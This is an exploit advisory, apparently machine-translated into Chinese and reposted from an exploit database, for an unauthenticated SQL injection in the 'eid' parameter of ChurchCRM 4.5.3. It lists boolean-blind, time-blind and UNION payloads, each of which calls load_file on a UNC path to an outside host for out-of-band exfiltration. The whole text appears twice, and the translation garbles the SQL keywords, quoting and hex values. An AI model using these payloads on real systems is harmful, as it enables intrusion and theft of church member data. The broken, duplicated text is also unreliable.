##利用标题: Churchcrm v4.5.3-121fcc1 -SQL注入
##作者: Sanan Qasimzada
## date: 06.07.2024
## Vendor: http://churchcrm.io/
## Software: https://github.com/churchrm/crm
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
在手动插入点1-参数“ eid”似乎是
容易受到SQL注入攻击的影响。
无需cookie,不需要管理员身份验证等。
攻击者可以轻松地使用该系统窃取信息
这个脆弱性。
状态:高脆弱性- 关键
[+]有效载荷:
``MySQL
---
参数: EID(GET)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
PAYLOAD: EID=(选择
load_file('\\\\\ l4qwtfn9ngsxicbtklv0x1e1rsxlsxllb92bq2gp6dv.smotaniak.com
\\ ior'))
或不是2407=2407
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: EID=(选择
load_file('\\\\\ l4qwtfn9ngsxicbtklv0x1e1rsxlsxllb92bq2gp6dv.smotaniak.com
\\ ior'))
(从(select(Sleep(3)))qevx选择9547)
type:联合查询
title: mysql联合查询(UTF8)-11列
PAYLOAD: EID=(选择
load_file('\\\\\ l4qwtfn9ngsxicbtklv0x1e1rsxlsxllb92bq2gp6dv.smotaniak.com
\\ ior'))
联盟全部选择
'utf8','utf8',concat(0x716a6b71,0x57646e68425556a56796a796a75716b504b4b504b4b4d69417869696969666a44c5744979979796d7664642564256565550 5670694b42,0x717a7871),'utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8',utf8','utf8',utf8',utf8',utf8','utf8','utf8'''''''''''''''''''''
---
````````
##复制:
[href](
)
##证明和Exploit:
[HREF](https://streamable.com/1EQHW2)
##时间花费:
01:00:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
利用开发人员
www.exploit-db.com
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
- -
系统管理员- 基础设施工程师
穿透测试工程师
0day exploit数据库https://0day.today/
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
##作者: Sanan Qasimzada
## date: 06.07.2024
## Vendor: http://churchcrm.io/
## Software: https://github.com/churchrm/crm
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
在手动插入点1-参数“ eid”似乎是
容易受到SQL注入攻击的影响。
无需cookie,不需要管理员身份验证等。
攻击者可以轻松地使用该系统窃取信息
这个脆弱性。
状态:高脆弱性- 关键
[+]有效载荷:
``MySQL
---
参数: EID(GET)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
PAYLOAD: EID=(选择
load_file('\\\\\ l4qwtfn9ngsxicbtklv0x1e1rsxlsxllb92bq2gp6dv.smotaniak.com
\\ ior'))
或不是2407=2407
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: EID=(选择
load_file('\\\\\ l4qwtfn9ngsxicbtklv0x1e1rsxlsxllb92bq2gp6dv.smotaniak.com
\\ ior'))
(从(select(Sleep(3)))qevx选择9547)
type:联合查询
title: mysql联合查询(UTF8)-11列
PAYLOAD: EID=(选择
load_file('\\\\\ l4qwtfn9ngsxicbtklv0x1e1rsxlsxllb92bq2gp6dv.smotaniak.com
\\ ior'))
联盟全部选择
'utf8','utf8',concat(0x716a6b71,0x57646e68425556a56796a796a75716b504b4b504b4b4d69417869696969666a44c5744979979796d7664642564256565550 5670694b42,0x717a7871),'utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8','utf8',utf8','utf8',utf8',utf8',utf8','utf8','utf8'''''''''''''''''''''
---
````````
##复制:
[href](
正在加载...
github.com
##证明和Exploit:
[HREF](https://streamable.com/1EQHW2)
##时间花费:
01:00:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
利用开发人员
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
- -
系统管理员- 基础设施工程师
穿透测试工程师
正在加载...
packetstormscurity.com
正在加载...
cve.mitre.org
正在加载...
cxsecurity.com
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/